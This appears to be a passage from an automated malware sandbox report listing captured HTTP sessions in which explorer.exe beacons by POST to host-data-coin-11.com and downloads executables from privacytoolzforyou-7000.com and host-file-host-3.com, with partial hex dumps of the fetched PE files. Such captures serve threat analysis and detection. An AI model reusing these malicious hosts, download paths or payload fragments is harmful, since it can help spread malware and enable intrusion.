4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.4	49785	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:12.811054945 CET	3407	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sdcdogt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: host-data-coin-11.com
Dec 1, 2021 09:14:12.912240982 CET	3408	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49758	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:13:55.520081043 CET	1081	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gqnrsjcd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: host-data-coin-11.com
Dec 1, 2021 09:13:55.621822119 CET	1082	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:13:55 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49786	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:12.998963118 CET	3409	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vfrmk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 275 Host: host-data-coin-11.com
Dec 1, 2021 09:14:13.097769976 CET	3410	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49787	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:13.272150040 CET	3411	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tgtmtdosym.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: host-data-coin-11.com
Dec 1, 2021 09:14:13.370440006 CET	3412	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%XQAc}yc0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49788	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:13.805233955 CET	3412	OUT	GET /downloads/toolspab3.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytoolzforyou-7000.com
Dec 1, 2021 09:14:13.887214899 CET	3414	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:13 GMT Content-Type: application/x-msdos-program Content-Length: 336896 Connection: close Last-Modified: Wed, 01 Dec 2021 08:14:01 GMT ETag: "52400-5d21141aa49b3" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf 4f 57 03 fb 2e 39 50 fb 2e 39 50 fb 2e 39 50 68 60 a1 50 fa 2e 39 50 94 58 92 50 d5 2e 39 50 94 58 a7 50 e2 2e 39 50 94 58 93 50 79 2e 39 50 f2 56 aa 50 f8 2e 39 50 fb 2e 38 50 18 2e 39 50 94 58 96 50 fa 2e 39 50 94 58 a3 50 fa 2e 39 50 94 58 a4 50 fa 2e 39 50 52 69 63 68 fb 2e 39 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 12 7d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c4 03 00 00 40 09 00 00 00 00 00 f0 94 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 38 71 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 bd 03 00 28 00 00 00 00 b0 0c 00 70 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 34 1d 00 00 c0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 8a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e c2 03 00 00 10 00 00 00 c4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 cc 08 00 00 e0 03 00 00 de 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 41 00 00 00 b0 0c 00 00 42 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b6 3b 00 00 00 00 0d 00 00 3c 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 c1 03 00 66 c1 03 00 7a c1 03 00 8e c1 03 00 9c c1 03 00 b0 c1 03 00 c6 c1 03 00 e4 c1 03 00 fa c1 03 00 0a c2 03 00 1c c2 03 00 3c c2 03 00 52 c2 03 00 64 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OW.9P.9P.9Ph`P.9PXP.9PXP.9PXPy.9PVP.9P.8P.9PXP.9PXP.9PXP.9PRich.9PPEL}_@@@8q(pA4h@l.textn `.data@@.rsrcpAB@@.reloc;<@BXfz<Rd

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49789	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:16.861721992 CET	3763	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://drrwv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: host-data-coin-11.com
Dec 1, 2021 09:14:16.963992119 CET	3764	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49790	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:17.105689049 CET	3765	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rbuyqamdy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: host-data-coin-11.com
Dec 1, 2021 09:14:17.211118937 CET	3765	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49791	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:17.609708071 CET	3766	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://omxkjxm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 354 Host: host-data-coin-11.com
Dec 1, 2021 09:14:17.711420059 CET	3767	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49792	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:17.888834953 CET	3768	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xigvfc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: host-data-coin-11.com
Dec 1, 2021 09:14:17.992974997 CET	3769	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49793	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:18.146295071 CET	3770	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nwqlosscc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: host-data-coin-11.com
Dec 1, 2021 09:14:18.239940882 CET	3770	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49794	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:18.325067043 CET	3771	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bkjjovqxmd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 354 Host: host-data-coin-11.com
Dec 1, 2021 09:14:18.428277969 CET	3772	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4a ed ac 8e 70 bc 57 da 4a d6 f7 22 81 20 ea c3 96 53 28 ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9JpWJ" S(c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49795	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:18.881853104 CET	3772	OUT	GET /files/4152_1638095425_4339.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
Dec 1, 2021 09:14:18.963581085 CET	3774	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:18 GMT Content-Type: application/x-msdos-program Content-Length: 2740224 Connection: close Last-Modified: Sun, 28 Nov 2021 10:30:25 GMT ETag: "29d000-5d1d6cff91027" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 f6 17 4c 43 97 79 1f 43 97 79 1f 43 97 79 1f 57 fc 7a 1e 48 97 79 1f 57 fc 7c 1e e5 97 79 1f 57 fc 7d 1e 51 97 79 1f 57 fc 7e 1e 42 97 79 1f 11 e2 7d 1e 52 97 79 1f 11 e2 7a 1e 56 97 79 1f 11 e2 7c 1e 69 97 79 1f 57 fc 78 1e 50 97 79 1f 43 97 78 1f d0 97 79 1f f6 e2 70 1e 44 97 79 1f f6 e2 86 1f 42 97 79 1f f6 e2 7b 1e 42 97 79 1f 52 69 63 68 43 97 79 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 77 37 a3 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 40 03 00 00 1c 01 00 00 00 00 00 10 52 46 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 6e 00 00 04 00 00 e5 b2 2a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fb 90 04 00 f8 00 00 00 00 a0 04 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 ed 3e 03 00 00 10 00 00 00 90 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 04 da 00 00 00 50 03 00 00 50 00 00 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 18 00 00 00 30 04 00 00 04 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 e0 01 00 00 00 50 04 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 1c 22 00 00 00 60 04 00 00 1e 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 90 04 00 00 02 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 04 00 00 02 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 68 65 6d 69 64 61 00 a0 41 00 00 b0 04 00 00 00 00 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 c4 27 00 00 50 46 00 00 c4 27 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 ba 2f 43 31 f0 0e da 6b c3 5c d3 df d8 e3 d4 d7 fc df d0 d2 2d ff 55 bb b4 b8 d8 4e c5 e8 dd 16 c7 8b 8c fd bf 73 ca f0 88 d3 1a b7 d2 75 95 ff 93 19 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$LCyCyCyWzHyW\|yW}QyW~By}RyzVy\|iyWxPyCxypDyBy{ByRichCyPELw7a@RFP@ n*@ > ` PP@@ $0@ P@@ "`@B.idata@.rsrc@@.themidaA`.boot'PF'``w/C1k\-UNsu

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49759	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:13:56.028903961 CET	1082	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sqdlx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 288 Host: host-data-coin-11.com
Dec 1, 2021 09:13:56.128304005 CET	1083	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:13:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 